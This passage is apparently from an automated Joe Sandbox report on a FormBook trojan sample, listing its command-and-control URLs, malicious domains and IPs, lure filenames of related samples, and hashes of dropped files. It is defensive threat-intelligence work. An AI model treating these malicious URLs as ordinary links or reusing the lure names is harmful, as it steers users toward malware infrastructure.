            http://www.bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP100%Avira URL Cloudmalware
            http://www.cavetta.org.mt0%Avira URL Cloudsafe
            http://www.dexiangovernment.org/a7b7/?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ=0%Avira URL Cloudsafe
            http://www.dexiangovernment.org/a7b7/0%Avira URL Cloudsafe
            http://www.d99qtpkvavjj.xyz/r4rr/0%Avira URL Cloudsafe
            http://www.erosonline.com.br/2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M=100%Avira URL Cloudmalware
            http://www.firmshow.top/02nb/?GBbljTO=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71eMMWXuG1yY1QMiMjNPzXdj8brJHDqS7NAGlwA4SgIkhB8sM3B24=&mB=rL4lP0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.theridleysuk.co.uk/frbh/0%Avira URL Cloudsafe
            http://www.rebornqababy.ru/waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4=100%Avira URL Cloudmalware
            http://www.faxinguxn6.cn/ofk1/?mB=rL4lP&GBbljTO=BhKqFmuQRptfX/n+GLbvkgrrHWTCYt1Sl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26W2Tj1BdpAMniD2/mHks2VLu3GzKm6FI2X0B8Walyh6GsFs9hylc=0%Avira URL Cloudsafe
            http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.cavetta.org.mt
            188.114.97.3
            truetrue
              unknown
              theridleysuk.co.uk
              3.33.130.190
              truetrue
                unknown
                d99qtpkvavjj.xyz
                3.33.130.190
                truetrue
                  unknown
                  www.firmshow.top
                  203.161.43.228
                  truetrue
                    unknown
                    hereboy.co.uk
                    3.33.130.190
                    truetrue
                      unknown
                      www.faxinguxn6.cn
                      108.186.253.49
                      truetrue
                        unknown
                        autonomyai.xyz
                        15.197.142.173
                        truetrue
                          unknown
                          8418a72e.jl800.vip.cname.scname.com
                          38.47.158.215
                          truetrue
                            unknown
                            web1163.kinghost.net
                            191.6.208.133
                            truetrue
                              unknown
                              bulletinnest.com
                              135.181.212.206
                              truetrue
                                unknown
                                dexiangovernment.org
                                3.33.130.190
                                truetrue
                                  unknown
                                  e6375a47.jl884.vip.cname.scname.com
                                  65.181.132.158
                                  truetrue
                                    unknown
                                    www.rebornqababy.ru
                                    87.236.19.243
                                    truetrue
                                      unknown
                                      www.autonomyai.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.hereboy.co.uk
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.erosonline.com.br
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.theridleysuk.co.uk
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.bulletinnest.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.d99qtpkvavjj.xyz
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.jl884.vip
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.jl800.vip
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.dexiangovernment.org
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        www.cloudsoda.xyz
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.rebornqababy.ru/waey/true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.autonomyai.xyz/b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lPtrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.jl884.vip/r4wk/?mB=rL4lP&GBbljTO=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOIdv2Hpbl0D0DeBG+01R28dU1nzrJm0yQzAnZDQ+iQUJ8Z49zmcM=true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.autonomyai.xyz/b2v9/true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.erosonline.com.br/2lcx/true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.faxinguxn6.cn/ofk1/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.cavetta.org.mt/yhnb/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.theridleysuk.co.uk/frbh/?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lPtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.hereboy.co.uk/4ez3/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.firmshow.top/02nb/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.bulletinnest.com/r7gq/true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.hereboy.co.uk/4ez3/?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lPtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jl800.vip/g67v/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lPtrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.dexiangovernment.org/a7b7/?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ=true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.d99qtpkvavjj.xyz/r4rr/true
                                                          • Avira URL Cloud: safe
unknown

Name | Malicious | Antivirus Detection | Reputation
http://www.firmshow.top/02nb/?GBbljTO=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71eMMWXuG1yY1QMiMjNPzXdj8brJHDqS7NAGlwA4SgIkhB8sM3B24=&mB=rL4lP | true | Avira URL Cloud: safe | unknown
http://www.theridleysuk.co.uk/frbh/ | true | Avira URL Cloud: safe | unknown
http://www.dexiangovernment.org/a7b7/ | true | Avira URL Cloud: safe | unknown
http://www.faxinguxn6.cn/ofk1/?mB=rL4lP&GBbljTO=BhKqFmuQRptfX/n+GLbvkgrrHWTCYt1Sl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26W2Tj1BdpAMniD2/mHks2VLu3GzKm6FI2X0B8Walyh6GsFs9hylc= | true | Avira URL Cloud: safe | unknown
http://www.erosonline.com.br/2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M= | true | Avira URL Cloud: malware | unknown
http://www.rebornqababy.ru/waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4= | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.live.c | convert.exe, 00000008.00000002.4573809328.0000000002949000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0 | convert.exe, 00000008.00000002.4580175851.0000000004C2E000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000461E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.cavetta.org.mt | YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4580723330.0000000005253000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | convert.exe, 00000008.00000002.4580175851.0000000003C7A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000366A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2 | convert.exe, 00000008.00000002.4580175851.000000000490A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.00000000042FA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
[IP distribution map; legend: No. of IPs < 25%, 25% to 50%, 50% to 75%, over 75%]

IP | Domain | Country | ASN | ASN Name | Malicious
203.161.43.228 | www.firmshow.top | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
135.181.212.206 | bulletinnest.com | Germany | 24940 | HETZNER-ASDE | true
108.186.253.49 | www.faxinguxn6.cn | United States | 54600 | PEGTECHINCUS | true
188.114.97.3 | www.cavetta.org.mt | European Union | 13335 | CLOUDFLARENETUS | true
15.197.142.173 | autonomyai.xyz | United States | 7430 | TANDEMUS | true
87.236.19.243 | www.rebornqababy.ru | Russian Federation | 198610 | BEGET-ASRU | true
65.181.132.158 | e6375a47.jl884.vip.cname.scname.com | United States | 7859 | PAIR-NETWORKSUS | true
38.47.158.215 | 8418a72e.jl800.vip.cname.scname.com | United States | 174 | COGENT-174US | true
191.6.208.133 | web1163.kinghost.net | Brazil | 28299 | IPV6InternetLtdaBR | true
3.33.130.190 | theridleysuk.co.uk | United States | 8987 | AMAZONEXPANSIONGB | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1466070
Start date and time: 2024-07-02 14:01:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hkLFB22XxS.exe (renamed because the original name is a hash value)
Original Sample Name: 04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@15/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 61
• Number of non-executed functions: 269
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: hkLFB22XxS.exe
Time | Type | Description
08:03:16 | API Interceptor | 10609033x Sleep call for process: convert.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 203.161.43.228
file.exe | malicious | FormBook | www.firmshow.top/02nb/
file.exe | malicious | FormBook | www.firmshow.top/02nb/
scanned file.exe | malicious | FormBook | www.techfirm.life/q3aw/?atIx56=65j+Em8vbA0b9ekM8gD1O+RqXUjbhA89agcyFrOK9tIOe4qFVeCIrHPiCIBKLeJhX3EQelscWW4TvORgVFTD9t5vpuMZ0Og92YRa0F26+VtQBz5v2g==&xPz=iteHld_xl
Custom_Inv_5634756433.exe | malicious | FormBook | www.aramoj.info/uqs4/
file.exe | malicious | FormBook | www.firmshow.top/02nb/
Cotizacin EXP 3382.007-3 - II.exe | malicious | FormBook | www.getmall.online/sdqf/
file.exe | malicious | FormBook | www.firmshow.top/02nb/
D02476723.exe | malicious | FormBook | www.aramoj.info/uqs4/
964275685.bat.exe | malicious | FormBook | www.aramoj.info/uqs4/
(INV) 1108-11-23-033-6218 (230804-1).scr.exe | malicious | FormBook | www.aramoj.info/uqs4/

Match: 135.181.212.206
file.exe | malicious | FormBook | www.bulletinnest.com/r7gq/
file.exe | malicious | FormBook | www.bulletinnest.com/r7gq/
hmwBElsQoPfbj1u.exe | malicious | FormBook | www.bulletinnest.com/r7gq/
Ur5XgusfXC.exe | malicious | FormBook | www.bulletinnest.com/r7gq/
hhghhg.exe | malicious | FormBook | www.bulletinnest.com/r7gq/
Scanned Documents.exe | malicious | FormBook | www.bulletinnest.com/sl8p/
DHL Newly Arrived Parcel.exe | malicious | FormBook | www.bulletinnest.com/sl8p/
U4atTYmWzmPN3Kz.exe | malicious | FormBook | www.bulletinnest.com/r7gq/?1vd=J5YXCuAbT0imQyqdw6hZUuEbhBlebvgGBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/7lDDdpLMvGlTVbtog8QZH++iyYsBo41dM87Q=&nxY=DTA0G
Newly Arrived Shipping Document.exe | malicious | FormBook | www.bulletinnest.com/sl8p/
Bank Failed Payment Report.exe | malicious | FormBook | www.bulletinnest.com/sl8p/

Match: 108.186.253.49
file.exe | malicious | FormBook | www.faxinguxn6.cn/ofk1/
file.exe | malicious | FormBook | www.faxinguxn6.cn/ofk1/
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: www.cavetta.org.mt
file.exe | malicious | FormBook | 188.114.97.3
file.exe | malicious | FormBook | 188.114.96.3
hmwBElsQoPfbj1u.exe | malicious | FormBook | 188.114.96.3
Ur5XgusfXC.exe | malicious | FormBook | 188.114.96.3
hhghhg.exe | malicious | FormBook | 188.114.97.3
U4atTYmWzmPN3Kz.exe | malicious | FormBook | 188.114.96.3

Match: www.firmshow.top
file.exe | malicious | FormBook | 203.161.43.228
file.exe | malicious | FormBook | 203.161.43.228
file.exe | malicious | FormBook | 203.161.43.228
file.exe | malicious | FormBook | 203.161.43.228
file.exe | malicious | FormBook | 203.161.43.228
file.exe | malicious | FormBook | 203.161.43.228
hmwBElsQoPfbj1u.exe | malicious | FormBook | 203.161.43.228
GP128MB7m1.exe | malicious | FormBook | 203.161.43.228
Ur5XgusfXC.exe | malicious | FormBook | 203.161.43.228
hhghhg.exe | malicious | FormBook | 203.161.43.228
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: HETZNER-ASDE
file.exe | malicious | PureLog Stealer, Vidar | 49.13.159.121
pDHKarOK2v.exe | malicious | CryptOne, Vidar | 49.13.159.121
https://he110ca11he1lpn0wwb112.pages.dev/ | malicious | TechSupportScam | 195.201.57.90
https://serviceca11he1pn0waa12.pages.dev/ | malicious | TechSupportScam | 195.201.57.90
1719859269.0326595_setup.exe | malicious | LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig | 49.13.159.121
http://www.midoregon.com | malicious | Unknown | 188.40.16.190
lQC7IiMNX1.elf | malicious | Mirai | 46.4.110.33
MT103-7543324334.exe | malicious | Remcos | 138.201.150.244
file.exe | malicious | FormBook | 135.181.212.206
file.exe | malicious | FormBook | 135.181.212.206

Match: VNPT-AS-VNVNPTCorpVN
94.156.79.133-mips-2024-07-01T19_26_38.elf | malicious | Mirai, Gafgyt | 14.248.175.67
YE40Payment3-R30819-38AIEY-39POIA-29102ND-K5920O-AO30382.exe | malicious | PureLog Stealer, zgRAT | 203.161.46.44
ETR-JULY-Payment291-J30172-NNR7T02-39RJ-E930A-CE4781-2IS8493.exe | malicious | PureLog Stealer, zgRAT | 203.161.46.44
Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe | malicious | FormBook | 203.161.55.102
mfQABKHhh1.elf | malicious | Mirai | 14.237.13.87
0wVYV60JHd.elf | malicious | Mirai | 113.178.195.88
2T9ShVKj85.elf | malicious | Mirai | 14.254.104.184
rPRESUPUESTO.exe | malicious | FormBook | 203.161.62.199
Ig2G1vg5Xd.exe | malicious | PureLog Stealer | 203.161.46.44
Quotation List Pdf.exe | malicious | FormBook | 203.161.41.207

Match: CLOUDFLARENETUS
llD1w4ROY5.exe | malicious | AgentTesla | 104.26.12.205
http://shippingservice-dhiexpress.dudaone.com/serviceid193811983/ | malicious | Unknown | 172.67.183.214
FNB-Copy.pdf | malicious | Unknown | 172.64.41.3
https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | 172.64.151.101
arrival notice.exe | malicious | AgentTesla | 172.67.74.152
https://www.aspcp.uk | malicious | Unknown | 104.16.160.145
https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | 104.17.25.14
FmQx1Fw3VA.exe | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
config.lnk.mal.lnk | malicious | CredGrabber, Meduza Stealer | 172.67.74.152
IF10339.pdf.lnk.mal.lnk | malicious | Unknown | 188.114.97.3

Match: PEGTECHINCUS
PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exe | malicious | FormBook | 107.148.208.115
file.exe | malicious | FormBook | 108.186.253.49
1R50C5E13BU8I.exe | malicious | FormBook | 192.74.245.33
file.exe | malicious | FormBook | 108.186.253.49
jvdETd7zDg.elf | malicious | Mirai, Gafgyt, Okiru | 154.88.173.204
SHn7OPnmZC.elf | malicious | Mirai | 108.186.60.14
3tz67z6uFW.exe | malicious | GhostRat, Mimikatz | 154.201.87.185
Shipping Documents.exe | malicious | FormBook | 154.212.44.122
Shipping Documents.exe | malicious | FormBook | 154.212.44.122
288292021 ABB.exe | malicious | FormBook | 107.149.174.220
No context
No context

Process: C:\Windows\SysWOW64\convert.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
Reputation: moderate, very likely benign file
Preview: SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\hkLFB22XxS.exe
File Type: data
Category: dropped
Size (bytes): 271872
Entropy (8bit): 7.991032149856088
Encrypted: true
SSDEEP: 6144:rmkh9mRofd6HNNZLgZJQSH21mkz1Cr/z68w7/VLwdP1Ztp1KLAIyjui:CkhUoqeZCewz1C/z68GVMdP1ZtpEdOui
MD5: A657D61808500148FDA21BA8AB86B51B
SHA1: 749897AE1DC307F71C1AB0ACB94150C862997A08
SHA-256: B546A5920AB1174E6314107B1E2F3C1FD0EFA4EBAEC6B5CB4B7DCC07F25DE5D2
SHA-512: D657BABEDF758575AB0F301DCF3BADE3B21F9BDDCC0EFD5A2D171FB92D3BB86DBFFEB058EAD17E03C5210214EF2397D32113D5BFD3EA09997CCF9E2895046A7F
Malicious: false
Reputation: low
Preview: |nr..7DUCm..>...i.52...{4L...147ZS7DUC5147ZS7DUC5147ZS7DUC5.47Z](.[C.8...R{.t.]XG.*!X#'"X.WV4=X0u!P.FB4s^*u.zb.Z57RjXN?.47ZS7DU:48..:4.y5$..TP.I..yUV.-...x5$.+...oW#..\R\.:4.DUC5147Z.rDU.404..EjDUC5147Z.7FTH4:47NW7DUC5147Zs"DUC%147jW7DU.51$7ZS5DUE5147ZS7BUC5147ZS.@UC7147ZS7FU..14'ZS'DUC5!47JS7DUC5!47ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC514..6O0UC5E'3ZS'DUC!547JS7DUC5147ZS7DUc51T7ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5

Process: C:\Users\user\Desktop\hkLFB22XxS.exe
File Type: data
Category: dropped
Size (bytes): 9776
Entropy (8bit): 7.59515351037497
Encrypted: false
                                                          SSDEEP:192:na0ZsqLUGeKtxWQa8GfK6mXClLXcmP7m/vlhwJFNePsdxTbfVaxhY2U:azqLFLtx3a8B6OClLXZKHXwgPsdx/fK2
                                                          MD5:18789F36661D4A9BA17888CF3FD93A14
                                                          SHA1:81867564B15E71F3316482BADFCD2DBC1776DDE5
                                                          SHA-256:6A1F994B7B56C355390621990F67480089FA35182C4BC77E40D8AF400A3091AB
                                                          SHA-512:730028546FF5FF30638BB1107358D18C75D0586B08F0F4C541EE4198683B0294FAAAD374EA53C61BED06D46C062D97E8FBF1364A1519EBD83B979DE4392543C7
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:EA06..pD.L&.J...7...sz%..5.M.s...i0.L&....g9..h...g8.Q&4Z5.c3...sY..E........2^&.Y..c.Ll.;..a2....Y..ob.M.@...a6.N'3I..ib....]........K........|...o..b..`.....8.....9.X.30...,.....2.Z..k9..6.@.o.l..X......g.9...v0..X....N.,.I.........9..&....r.'.Y...c ....Aa.H.......F.3<..Y@.6...$.`....f@...x..j....Br.....Xf.0..l....n...Y&@5_..h....&.5_..p.U.., 5_....U..,.5_..`.U..f@5\..>3...M.^.a.Z..k6.z..o6......@.....3y..G../Z.M. .....jr....n.u....$.`./.o8...f.G_T.......>_.......zk5....i....3 ...................`.M..`... ...c...@..(.'.4.X.{>K...c.MlS@..X..._..p.....>K.#G.b..3|v9..G.4.X.@8_..kc..i|v9....c.h.,v..........7.Ml.K5...M..0;..8.Nf.0.L..6i..f..+..ff6)...6.N,....f...E...Y....3.I.....M.......vI.....0.....2p....<d....,vb........N@!+..'& ....,fo2..,.).......r.2.X...c3k$.ef.Y.!...Gf@....,f.9..,.. .#7.....c.0.....y..p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b.!....F ....B5c.L.
                                                          Process:C:\Users\user\Desktop\hkLFB22XxS.exe
                                                          File Type:ASCII text, with very long lines (28740), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):28740
                                                          Entropy (8bit):3.5830333524248306
                                                          Encrypted:false
                                                          SSDEEP:768:WiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbx+IT63J4vfF3if6gyzx:WiTZ+2QoioGRk6ZklputwjpjBkCiw2R5
                                                          MD5:630889F479DDF72437C461C711FE2C67
                                                          SHA1:F71D76EB70A0F2D04B73548CEF5C220BDF8C3802
                                                          SHA-256:E073A0241D58C64E343B47DBB1F06CFCF24EF5264329B3788922C3D804684DB0
                                                          SHA-512:2D7ED04990031D40BC38E868E95273ED1EAA76F4F7BC95C3FACAE8173200136E5A911E0DE07FF87F9EBEF38DD308A514EC210328469F8241325C76A08CE05185
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:
                                                          Process:C:\Users\user\Desktop\hkLFB22XxS.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271872
                                                          Entropy (8bit):7.991032149856088
                                                          Encrypted:true
                                                          SSDEEP:6144:rmkh9mRofd6HNNZLgZJQSH21mkz1Cr/z68w7/VLwdP1Ztp1KLAIyjui:CkhUoqeZCewz1C/z68GVMdP1ZtpEdOui
                                                          MD5:A657D61808500148FDA21BA8AB86B51B
                                                          SHA1:749897AE1DC307F71C1AB0ACB94150C862997A08
                                                          SHA-256:B546A5920AB1174E6314107B1E2F3C1FD0EFA4EBAEC6B5CB4B7DCC07F25DE5D2
